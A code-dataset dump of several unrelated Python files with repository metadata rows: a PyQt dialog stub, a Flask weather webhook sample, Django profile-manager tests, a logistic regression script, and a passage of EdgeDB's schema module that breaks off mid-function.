        self.LEHandadd3.setProperty("cssClass", _translate("handadds", "secondary"))
        self.LEHandadd4.setProperty("cssClass", _translate("handadds", "secondary"))
        self.LEHandadd5.setProperty("cssClass", _translate("handadds", "secondary"))
        self.label_11.setText(_translate("handadds", "ml"))
        self.label_12.setText(_translate("handadds", "ml"))
        self.label_13.setText(_translate("handadds", "ml"))
        self.label_15.setText(_translate("handadds", "ml"))
        self.label_14.setText(_translate("handadds", "ml"))
        self.PBEintragen.setText(_translate("handadds", "Eintragen"))
        self.PBEintragen.setProperty("cssClass", _translate("handadds", "btn-inverted"))
        self.PBAbbrechen.setText(_translate("handadds", "Abbrechen"))
from src.ui_elements.clickablelineedit import ClickableLineEdit
if __name__ == "__main__":
    # Standalone preview: create a bare QDialog, install this generated UI
    # on it, and run the Qt event loop.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    handadds = QtWidgets.QDialog()
    ui = Ui_handadds()
    ui.setupUi(handadds)
    handadds.show()
    # exec_() blocks until the dialog is closed; propagate its exit status.
    sys.exit(app.exec_())
| 46.419355 | 105 | 0.691105 |
acfb6118c412a1d00d79c1f65100746a99557f3a | 40 | py | Python | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | null | null | null | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | 1 | 2016-05-11T17:06:39.000Z | 2016-05-11T17:06:39.000Z | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | null | null | null | from .core import start, update, finish
| 20 | 39 | 0.775 |
acfb6184ac74931b91a80ca7228caf530de28307 | 4,835 | py | Python | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)


@app.route('/webhook', methods=['POST'])
def webhook():
    """Handle an API.AI webhook POST with a fixed JSON fulfillment.

    Parses the request body as JSON (``force=True`` tolerates a missing
    Content-Type header, ``silent=True`` yields None on bad input), logs
    it, and returns a canned "cold" response.
    """
    req = request.get_json(silent=True, force=True)

    print("Request:")
    print(json.dumps(req, indent=4))

    # res = processRequest(req)  # full Yahoo-weather flow, currently bypassed

    # Bug fix: the previous stub also attached
    #   "data": {"slack": slack_message, "facebook": facebook_message}
    # but neither name exists at module scope (they are locals of
    # makeWebhookResult), so every request died with a NameError.
    res = {
        "speech": "cold",
        "displayText": "cold",
        "source": "apiai-weather-webhook-sample"
    }

    res = json.dumps(res, indent=4)
    r = make_response(res)
    r.headers['Content-Type'] = 'application/json'
    return r
def processRequest(req):
    """Fulfil a yahooWeatherForecast action via Yahoo's public YQL API.

    Returns an empty dict for any other action or when no city parameter
    is present in the request.

    NOTE(review): this uses Python 2 urllib (``urllib.urlencode`` /
    ``urllib.urlopen``); under Python 3 these live in ``urllib.parse`` and
    ``urllib.request`` — confirm the intended interpreter before porting.
    """
    if req.get("result").get("action") != "yahooWeatherForecast":
        return {}
    baseurl = "https://query.yahooapis.com/v1/public/yql?"
    yql_query = makeYqlQuery(req)
    if yql_query is None:
        return {}
    # URL-encode the YQL statement as the 'q' parameter and ask for JSON.
    yql_url = baseurl + urllib.urlencode({'q': yql_query}) + "&format=json"
    print(yql_url)
    result = urllib.urlopen(yql_url).read()
    print("yql result: ")
    print(result)
    data = json.loads(result)
    res = makeWebhookResult(data)
    return res
def makeYqlQuery(req):
    """Build the YQL weather query for the city named in an API.AI request.

    Returns None when the request carries no ``geo-city`` parameter (or
    when the ``result``/``parameters`` levels are missing entirely, which
    previously raised AttributeError on ``None.get``).
    """
    result = req.get("result")
    if result is None:
        return None
    parameters = result.get("parameters")
    if parameters is None:
        return None
    city = parameters.get("geo-city")
    if city is None:
        return None
    # NOTE(review): ``city`` is interpolated verbatim into the YQL string;
    # a quote character in the city name would break or alter the query.
    return ("select * from weather.forecast where woeid in "
            "(select woeid from geo.places(1) where text='" + city + "')")
def makeWebhookResult(data):
    """Translate a Yahoo YQL weather payload into an API.AI fulfillment."""
    # Walk down the payload; any missing level yields an empty result.
    query = data.get('query')
    if query is None:
        return {}
    result = query.get('results')
    if result is None:
        return {}
    channel = result.get('channel')
    if channel is None:
        return {}

    item = channel.get('item')
    location = channel.get('location')
    units = channel.get('units')
    if location is None or item is None or units is None:
        return {}

    condition = item.get('condition')
    if condition is None:
        return {}

    speech = ("Today in " + location.get('city') + ": "
              + condition.get('text') + ", the temperature is "
              + condition.get('temp') + " " + units.get('temperature'))

    print("Response:")
    print(speech)

    # Hoist values that appear more than once below.
    wind = channel.get('wind')
    atmosphere = channel.get('atmosphere')
    icon_url = ("http://l.yimg.com/a/i/us/we/52/"
                + condition.get('code') + ".gif")

    slack_message = {
        "text": speech,
        "attachments": [
            {
                "title": channel.get('title'),
                "title_link": channel.get('link'),
                "color": "#36a64f",
                "fields": [
                    {
                        "title": "Condition",
                        "value": ("Temp " + condition.get('temp')
                                  + " " + units.get('temperature')),
                        "short": "false"
                    },
                    {
                        "title": "Wind",
                        "value": ("Speed: " + wind.get('speed')
                                  + ", direction: " + wind.get('direction')),
                        "short": "true"
                    },
                    {
                        "title": "Atmosphere",
                        "value": ("Humidity " + atmosphere.get('humidity')
                                  + " pressure " + atmosphere.get('pressure')),
                        "short": "true"
                    }
                ],
                "thumb_url": icon_url
            }
        ]
    }

    facebook_message = {
        "attachment": {
            "type": "template",
            "payload": {
                "template_type": "generic",
                "elements": [
                    {
                        "title": channel.get('title'),
                        "image_url": icon_url,
                        "subtitle": speech,
                        "buttons": [
                            {
                                "type": "web_url",
                                "url": channel.get('link'),
                                "title": "View Details"
                            }
                        ]
                    }
                ]
            }
        }
    }

    print(json.dumps(slack_message))

    return {
        "speech": speech,
        "displayText": speech,
        "data": {"slack": slack_message, "facebook": facebook_message},
        # "contextOut": [],
        "source": "apiai-weather-webhook-sample"
    }
if __name__ == '__main__':
    # Honour the platform-assigned port (e.g. Heroku), default to 5000.
    port = int(os.getenv('PORT', 5000))

    # Fix: the original used a Python 2 ``print`` *statement*, which is a
    # SyntaxError on Python 3; the parenthesized call runs on both.
    print("Starting app on port %d" % port)

    app.run(debug=False, port=port, host='0.0.0.0')
| 28.110465 | 118 | 0.479421 |
acfb61bc40d5431471069c61ee3172c95da75dde | 6,637 | py | Python | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | from seahub.profile.models import Profile
from seahub.test_utils import BaseTestCase
class ProfileManagerTest(BaseTestCase):
    """Tests for the custom manager helpers on the Profile model."""

    def setUp(self):
        pass

    def _assert_fields(self, profile, user, **expected):
        # Verify the owner plus each field named in ``expected``.
        assert profile.user == user
        for field, value in expected.items():
            assert getattr(profile, field) == value

    def test_get_username_by_contact_email(self):
        lookup = Profile.objects.get_username_by_contact_email
        assert lookup('a@a.com') is None

        # A single profile with the contact email resolves to its owner.
        first = self.user.username
        Profile.objects.add_or_update(first, contact_email='a@a.com')
        assert lookup('a@a.com') == first

        # An ambiguous contact email (two owners) resolves to nothing.
        second = self.admin.username
        Profile.objects.add_or_update(second, contact_email='a@a.com')
        assert lookup('a@a.com') is None

    def test_convert_login_str_to_username(self):
        convert = Profile.objects.convert_login_str_to_username
        assert convert('a@a.com') == 'a@a.com'

        # A login id becomes an alias for the username.
        Profile.objects.add_or_update(username='a@a.com', login_id='aaa')
        assert convert('a@a.com') == 'a@a.com'
        assert convert('aaa') == 'a@a.com'

        # So does a contact email; all three strings now resolve.
        Profile.objects.add_or_update(username='a@a.com',
                                      contact_email='a+1@a.com')
        for login in ('a@a.com', 'aaa', 'a+1@a.com'):
            assert convert(login) == 'a@a.com'

    def test_get_contact_email_by_user(self):
        username = self.user.username
        # No profile yet: the username doubles as the contact email.
        assert Profile.objects.get_contact_email_by_user(username) == username

        # A profile without a contact email still falls back to username.
        profile = Profile.objects.add_or_update(username, 'nickname')
        assert Profile.objects.get_contact_email_by_user(username) == username

        # Once set, the explicit contact email wins.
        profile.contact_email = 'contact@foo.com'
        profile.save()
        assert (Profile.objects.get_contact_email_by_user(username)
                == 'contact@foo.com')

    def test_add_or_update(self):
        username = self.user.username
        for stale in Profile.objects.filter(user=username):
            stale.delete()

        expected = {
            'nickname': 'nickname',
            'intro': 'hello',
            'lang_code': 'ch',
            'login_id': username,
            'contact_email': username,
            'institution': 'test',
        }
        profile = Profile.objects.add_or_update(
            username, 'nickname', intro='hello', lang_code='ch',
            login_id=username, contact_email=username, institution='test')
        self._assert_fields(profile, username, **expected)

        # Changing the nickname must leave every other field intact.
        profile = Profile.objects.add_or_update(username, 'nick')
        expected['nickname'] = 'nick'
        self._assert_fields(profile, username, **expected)

        # The same holds for each keyword field updated on its own.
        for kwargs in (
            {'intro': 'intro'},
            {'lang_code': 'en'},
            {'login_id': 'test@test.com'},
            {'contact_email': 'test@contact.com'},
            {'institution': 'insti'},
        ):
            profile = Profile.objects.add_or_update(username, **kwargs)
            expected.update(kwargs)
            self._assert_fields(profile, username, **expected)

    def test_add_or_update_with_empty(self):
        username = self.user.username
        for stale in Profile.objects.filter(user=username):
            stale.delete()

        profile = Profile.objects.add_or_update(
            username, 'nickname', intro='hello', lang_code='ch',
            login_id=username, contact_email=username, institution='test')
        self._assert_fields(
            profile, username, nickname='nickname', intro='hello',
            lang_code='ch', login_id=username, contact_email=username,
            institution='test')

        # Empty strings are accepted and stored for every field.
        profile = Profile.objects.add_or_update(username, '')
        assert profile.nickname == ''
        for field in ('intro', 'lang_code', 'login_id', 'contact_email'):
            profile = Profile.objects.add_or_update(username, **{field: ''})
            assert getattr(profile, field) == ''
acfb620e4861cbb29c105c8b90402f1b27f6843e | 707 | py | Python | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from itertools import combinations
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
# Load the pre-selected feature matrices and flatten the label columns
# into 1-D arrays as expected by scikit-learn.
X_train = pd.read_csv('X_train_best.csv')
X_test = pd.read_csv('X_test_best.csv')
y_train = pd.read_csv('y_train.csv').values.ravel()
y_test = pd.read_csv('y_test.csv').values.ravel()

# Fixed seed for reproducibility; high max_iter so the solver converges.
model = LogisticRegression(random_state = 2, max_iter = 10000)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)

# Percentage scores rounded to two decimals.  NOTE(review): accuracy_score
# is called as (y_pred, y_test); accuracy is symmetric so the value is the
# same, but the conventional argument order is (y_true, y_pred).
acc = round(accuracy_score(y_pred, y_test)*100,2)
f1 = round(f1_score(y_test, y_pred)*100,2)
print(acc, f1) # 78.08 40.74
| 22.806452 | 62 | 0.779349 |
acfb624af6b576f5e08c44b60c99a52d82d66fef | 62,806 | py | Python | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import abc
import collections
import functools
import itertools
import immutables as immu
from edb import errors
from edb.common import english
from . import casts as s_casts
from . import functions as s_func
from . import migrations as s_migrations
from . import modules as s_mod
from . import name as sn
from . import objects as so
from . import operators as s_oper
from . import pseudo as s_pseudo
from . import types as s_types
if TYPE_CHECKING:
    import uuid

    from edb.common import parsing


# Reverse-reference index:
#   referenced object id
#     -> (referring class, field name)
#       -> map of referring object ids (used as an immutable set).
Refs_T = immu.Map[
    uuid.UUID,
    immu.Map[
        Tuple[Type[so.Object], str],
        immu.Map[uuid.UUID, None],
    ],
]
# Modules that constitute the standard part of a schema.
STD_MODULES = (
    sn.UnqualName('std'),
    sn.UnqualName('schema'),
    sn.UnqualName('math'),
    sn.UnqualName('sys'),
    sn.UnqualName('cfg'),
    sn.UnqualName('cal'),
)

# Specifies the order of processing of files and directories in lib/
STD_SOURCES = (
    sn.UnqualName('std'),
    sn.UnqualName('schema'),
    sn.UnqualName('math'),
    sn.UnqualName('sys'),
    sn.UnqualName('cfg'),
    sn.UnqualName('cal'),
    sn.UnqualName('ext'),
)

# Bound TypeVar so mutating methods can return the concrete schema type.
Schema_T = TypeVar('Schema_T', bound='Schema')
class Schema(abc.ABC):
    """Abstract interface of an EdgeDB schema.

    Implementations map object ids to field data and support lookup by
    id, fully-qualified name, global name and (for functions/operators)
    shortname, plus reverse-reference queries.  Mutating methods return
    a new schema instance instead of modifying the receiver.
    """

    @abc.abstractmethod
    def add_raw(
        self: Schema_T,
        id: uuid.UUID,
        sclass: Type[so.Object],
        data: Tuple[Any, ...],
    ) -> Schema_T:
        """Return a new schema with an object added from raw field data."""
        raise NotImplementedError

    @abc.abstractmethod
    def add(
        self: Schema_T,
        id: uuid.UUID,
        sclass: Type[so.Object],
        data: Tuple[Any, ...],
    ) -> Schema_T:
        raise NotImplementedError

    @abc.abstractmethod
    def discard(self: Schema_T, obj: so.Object) -> Schema_T:
        raise NotImplementedError

    @abc.abstractmethod
    def delete(self: Schema_T, obj: so.Object) -> Schema_T:
        raise NotImplementedError

    @abc.abstractmethod
    def update_obj(
        self: Schema_T,
        obj: so.Object,
        updates: Mapping[str, Any],
    ) -> Schema_T:
        """Return a new schema with *updates* applied to *obj*'s fields."""
        raise NotImplementedError

    @abc.abstractmethod
    def maybe_get_obj_data_raw(
        self,
        obj: so.Object,
    ) -> Optional[Tuple[Any, ...]]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_obj_data_raw(
        self,
        obj: so.Object,
    ) -> Tuple[Any, ...]:
        raise NotImplementedError

    @abc.abstractmethod
    def set_obj_field(
        self: Schema_T,
        obj: so.Object,
        field: str,
        value: Any,
    ) -> Schema_T:
        raise NotImplementedError

    @abc.abstractmethod
    def unset_obj_field(
        self: Schema_T,
        obj: so.Object,
        field: str,
    ) -> Schema_T:
        raise NotImplementedError

    @abc.abstractmethod
    def get_functions(
        self,
        name: Union[str, sn.Name],
        default: Union[
            Tuple[s_func.Function, ...], so.NoDefaultT
        ] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
    ) -> Tuple[s_func.Function, ...]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_operators(
        self,
        name: Union[str, sn.Name],
        default: Union[
            Tuple[s_oper.Operator, ...], so.NoDefaultT
        ] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
    ) -> Tuple[s_oper.Operator, ...]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_casts_to_type(
        self,
        to_type: s_types.Type,
        *,
        implicit: bool = False,
        assignment: bool = False,
    ) -> FrozenSet[s_casts.Cast]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_casts_from_type(
        self,
        from_type: s_types.Type,
        *,
        implicit: bool = False,
        assignment: bool = False,
    ) -> FrozenSet[s_casts.Cast]:
        raise NotImplementedError

    # get_referrers: objects that reference *scls* (optionally filtered
    # by referring class and/or field name).
    @overload
    def get_referrers(
        self,
        scls: so.Object,
        *,
        scls_type: Type[so.Object_T],
        field_name: Optional[str] = None,
    ) -> FrozenSet[so.Object_T]:
        ...

    @overload
    def get_referrers(  # NoQA: F811
        self,
        scls: so.Object,
        *,
        scls_type: None = None,
        field_name: Optional[str] = None,
    ) -> FrozenSet[so.Object]:
        ...

    @abc.abstractmethod
    def get_referrers(  # NoQA: F811
        self,
        scls: so.Object,
        *,
        scls_type: Optional[Type[so.Object_T]] = None,
        field_name: Optional[str] = None,
    ) -> FrozenSet[so.Object_T]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_referrers_ex(
        self,
        scls: so.Object,
        *,
        scls_type: Optional[Type[so.Object_T]] = None,
    ) -> Dict[
        Tuple[Type[so.Object_T], str],
        FrozenSet[so.Object_T],
    ]:
        raise NotImplementedError

    @overload
    def get_by_id(
        self,
        obj_id: uuid.UUID,
        default: Union[so.Object, so.NoDefaultT] = so.NoDefault,
        *,
        type: None = None,
    ) -> so.Object:
        ...

    @overload
    def get_by_id(  # NoQA: F811
        self,
        obj_id: uuid.UUID,
        default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
        *,
        type: Optional[Type[so.Object_T]] = None,
    ) -> so.Object_T:
        ...

    @overload
    def get_by_id(  # NoQA: F811
        self,
        obj_id: uuid.UUID,
        default: None = None,
        *,
        type: Optional[Type[so.Object_T]] = None,
    ) -> Optional[so.Object_T]:
        ...

    def get_by_id(  # NoQA: F811
        self,
        obj_id: uuid.UUID,
        default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
        *,
        type: Optional[Type[so.Object_T]] = None,
    ) -> Optional[so.Object_T]:
        """Look an object up by id; delegates to ``_get_by_id``."""
        return self._get_by_id(obj_id, default, type=type)

    @abc.abstractmethod
    def _get_by_id(
        self,
        obj_id: uuid.UUID,
        default: Union[so.Object_T, so.NoDefaultT, None],
        *,
        type: Optional[Type[so.Object_T]],
    ) -> Optional[so.Object_T]:
        raise NotImplementedError

    @overload
    def get_global(
        self,
        objtype: Type[so.Object_T],
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
    ) -> so.Object_T:
        ...

    @overload
    def get_global(  # NoQA: F811
        self,
        objtype: Type[so.Object_T],
        name: Union[str, sn.Name],
        default: None = None,
    ) -> Optional[so.Object_T]:
        ...

    def get_global(  # NoQA: F811
        self,
        objtype: Type[so.Object_T],
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
    ) -> Optional[so.Object_T]:
        """Look a non-qualified object up by name; delegates to
        ``_get_global``."""
        return self._get_global(objtype, name, default)

    @abc.abstractmethod
    def _get_global(
        self,
        objtype: Type[so.Object_T],
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT, None],
    ) -> Optional[so.Object_T]:
        raise NotImplementedError

    @overload
    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> so.Object:
        ...

    @overload
    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: None,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> Optional[so.Object]:
        ...

    @overload
    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        type: Type[so.Object_T],
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> so.Object_T:
        ...

    @overload
    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: None,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        type: Type[so.Object_T],
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> Optional[so.Object_T]:
        ...

    @overload
    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object, so.NoDefaultT, None] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        type: Optional[Type[so.Object_T]] = None,
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> Optional[so.Object]:
        ...

    def get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object, so.NoDefaultT, None] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        type: Optional[Type[so.Object_T]] = None,
        condition: Optional[Callable[[so.Object], bool]] = None,
        label: Optional[str] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
    ) -> Optional[so.Object]:
        """Look a qualified object up by name; delegates to ``_get``."""
        return self._get(
            name,
            default,
            module_aliases=module_aliases,
            type=type,
            condition=condition,
            label=label,
            sourcectx=sourcectx,
        )

    @abc.abstractmethod
    def _get(  # NoQA: F811
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object, so.NoDefaultT, None],
        *,
        module_aliases: Optional[Mapping[Optional[str], str]],
        type: Optional[Type[so.Object_T]],
        condition: Optional[Callable[[so.Object], bool]],
        label: Optional[str],
        sourcectx: Optional[parsing.ParserContext],
    ) -> Optional[so.Object]:
        raise NotImplementedError

    @abc.abstractmethod
    def has_object(self, object_id: uuid.UUID) -> bool:
        raise NotImplementedError

    @abc.abstractmethod
    def has_module(self, module: str) -> bool:
        raise NotImplementedError

    def get_children(
        self,
        scls: so.Object_T,
    ) -> FrozenSet[so.Object_T]:
        """Return objects of the same class that list *scls* in 'bases'."""
        # Ideally get_referrers needs to be made generic via
        # an overload on scls_type, but mypy crashes on that.
        return self.get_referrers(
            scls,
            scls_type=type(scls),
            field_name='bases',
        )

    def get_descendants(
        self,
        scls: so.Object_T,
    ) -> FrozenSet[so.Object_T]:
        """Return objects of the same class that list *scls* in
        'ancestors'."""
        return self.get_referrers(
            scls, scls_type=type(scls), field_name='ancestors')

    @abc.abstractmethod
    def get_objects(
        self,
        *,
        exclude_stdlib: bool = False,
        exclude_global: bool = False,
        exclude_internal: bool = True,
        included_modules: Optional[Iterable[sn.Name]] = None,
        excluded_modules: Optional[Iterable[sn.Name]] = None,
        included_items: Optional[Iterable[sn.Name]] = None,
        excluded_items: Optional[Iterable[sn.Name]] = None,
        type: Optional[Type[so.Object_T]] = None,
        extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
    ) -> SchemaIterator[so.Object_T]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_modules(self) -> Tuple[s_mod.Module, ...]:
        raise NotImplementedError

    @abc.abstractmethod
    def get_last_migration(self) -> Optional[s_migrations.Migration]:
        raise NotImplementedError
class FlatSchema(Schema):
    """Schema implementation backed by a set of immutable maps."""

    # Raw field-data tuples keyed by object id.
    _id_to_data: immu.Map[uuid.UUID, Tuple[Any, ...]]
    # Schema class name for each object id.
    _id_to_type: immu.Map[uuid.UUID, str]
    # Fully-qualified name -> id (qualified objects only).
    _name_to_id: immu.Map[sn.Name, uuid.UUID]
    # (class, shortname) -> candidate ids (functions and operators).
    _shortname_to_id: immu.Map[
        Tuple[Type[so.Object], sn.Name],
        FrozenSet[uuid.UUID],
    ]
    # (class, name) -> id for non-qualified (global) objects.
    _globalname_to_id: immu.Map[
        Tuple[Type[so.Object], sn.Name],
        uuid.UUID,
    ]
    # Reverse-reference index; see Refs_T.
    _refs_to: Refs_T
    # Monotonic counter bumped by every _replace().
    _generation: int
def __init__(self) -> None:
self._id_to_data = immu.Map()
self._id_to_type = immu.Map()
self._shortname_to_id = immu.Map()
self._name_to_id = immu.Map()
self._globalname_to_id = immu.Map()
self._refs_to = immu.Map()
self._generation = 0
def _replace(
self,
*,
id_to_data: Optional[immu.Map[uuid.UUID, Tuple[Any, ...]]] = None,
id_to_type: Optional[immu.Map[uuid.UUID, str]] = None,
name_to_id: Optional[immu.Map[sn.Name, uuid.UUID]] = None,
shortname_to_id: Optional[
immu.Map[
Tuple[Type[so.Object], sn.Name],
FrozenSet[uuid.UUID]
]
],
globalname_to_id: Optional[
immu.Map[Tuple[Type[so.Object], sn.Name], uuid.UUID]
],
refs_to: Optional[Refs_T] = None,
) -> FlatSchema:
new = FlatSchema.__new__(FlatSchema)
if id_to_data is None:
new._id_to_data = self._id_to_data
else:
new._id_to_data = id_to_data
if id_to_type is None:
new._id_to_type = self._id_to_type
else:
new._id_to_type = id_to_type
if name_to_id is None:
new._name_to_id = self._name_to_id
else:
new._name_to_id = name_to_id
if shortname_to_id is None:
new._shortname_to_id = self._shortname_to_id
else:
new._shortname_to_id = shortname_to_id
if globalname_to_id is None:
new._globalname_to_id = self._globalname_to_id
else:
new._globalname_to_id = globalname_to_id
if refs_to is None:
new._refs_to = self._refs_to
else:
new._refs_to = refs_to
new._generation = self._generation + 1
return new # type: ignore
    def _update_obj_name(
        self,
        obj_id: uuid.UUID,
        sclass: Type[so.Object],
        old_name: Optional[sn.Name],
        new_name: Optional[sn.Name],
    ) -> Tuple[
        immu.Map[sn.Name, uuid.UUID],
        immu.Map[Tuple[Type[so.Object], sn.Name], FrozenSet[uuid.UUID]],
        immu.Map[Tuple[Type[so.Object], sn.Name], uuid.UUID],
    ]:
        """Recompute the name-lookup tables for a rename of *obj_id*.

        Deregisters *old_name* (if given) and registers *new_name* (if
        given) in the appropriate table: the global-name table for
        non-qualified objects, the fully-qualified-name table otherwise,
        plus the shortname cache for functions and operators.  Raises
        SchemaError on a name collision and UnknownModuleError when the
        target module does not exist.  Returns the three updated maps.
        """
        name_to_id = self._name_to_id
        shortname_to_id = self._shortname_to_id
        globalname_to_id = self._globalname_to_id
        # Non-QualifiedObject classes are keyed globally by (class, name).
        is_global = not issubclass(sclass, so.QualifiedObject)
        # Only functions and operators maintain the shortname cache.
        has_sn_cache = issubclass(sclass, (s_func.Function, s_oper.Operator))

        if old_name is not None:
            if is_global:
                globalname_to_id = globalname_to_id.delete((sclass, old_name))
            else:
                name_to_id = name_to_id.delete(old_name)
            if has_sn_cache:
                old_shortname = sn.shortname_from_fullname(old_name)
                sn_key = (sclass, old_shortname)
                # Drop this id from the shortname bucket; remove the
                # bucket entirely if it becomes empty.
                new_ids = shortname_to_id[sn_key] - {obj_id}
                if new_ids:
                    shortname_to_id = shortname_to_id.set(sn_key, new_ids)
                else:
                    shortname_to_id = shortname_to_id.delete(sn_key)

        if new_name is not None:
            if is_global:
                key = (sclass, new_name)
                if key in globalname_to_id:
                    other_obj = self.get_by_id(
                        globalname_to_id[key], type=so.Object)
                    vn = other_obj.get_verbosename(self, with_parent=True)
                    raise errors.SchemaError(
                        f'{vn} already exists')
                globalname_to_id = globalname_to_id.set(key, obj_id)
            else:
                assert isinstance(new_name, sn.QualName)
                # '__derived__' is exempt from the module-existence check.
                if (
                    not self.has_module(new_name.module)
                    and new_name.module != '__derived__'
                ):
                    raise errors.UnknownModuleError(
                        f'module {new_name.module!r} is not in this schema')

                if new_name in name_to_id:
                    other_obj = self.get_by_id(
                        name_to_id[new_name], type=so.Object)
                    vn = other_obj.get_verbosename(self, with_parent=True)
                    raise errors.SchemaError(
                        f'{vn} already exists')
                name_to_id = name_to_id.set(new_name, obj_id)

            if has_sn_cache:
                new_shortname = sn.shortname_from_fullname(new_name)
                sn_key = (sclass, new_shortname)
                try:
                    ids = shortname_to_id[sn_key]
                except KeyError:
                    ids = frozenset()
                shortname_to_id = shortname_to_id.set(sn_key, ids | {obj_id})

        return name_to_id, shortname_to_id, globalname_to_id
    def update_obj(
        self,
        obj: so.Object,
        updates: Mapping[str, Any],
    ) -> FlatSchema:
        """Return a new schema with *updates* applied to *obj*'s fields.

        Handles renames (updating the name-lookup tables), reduces
        reducible field values to their stored form, and keeps the
        reverse-reference index in sync for object-reference fields.
        """
        if not updates:
            return self

        obj_id = obj.id
        sclass = type(obj)
        all_fields = sclass.get_schema_fields()
        object_ref_fields = sclass.get_object_reference_fields()
        reducible_fields = sclass.get_reducible_fields()

        try:
            data = list(self._id_to_data[obj_id])
        except KeyError:
            # Object not yet present: start from an all-None data row.
            data = [None] * len(all_fields)

        name_to_id = None
        shortname_to_id = None
        globalname_to_id = None
        orig_refs = {}
        new_refs = {}

        for fieldname, value in updates.items():
            field = all_fields[fieldname]
            findex = field.index
            if fieldname == 'name':
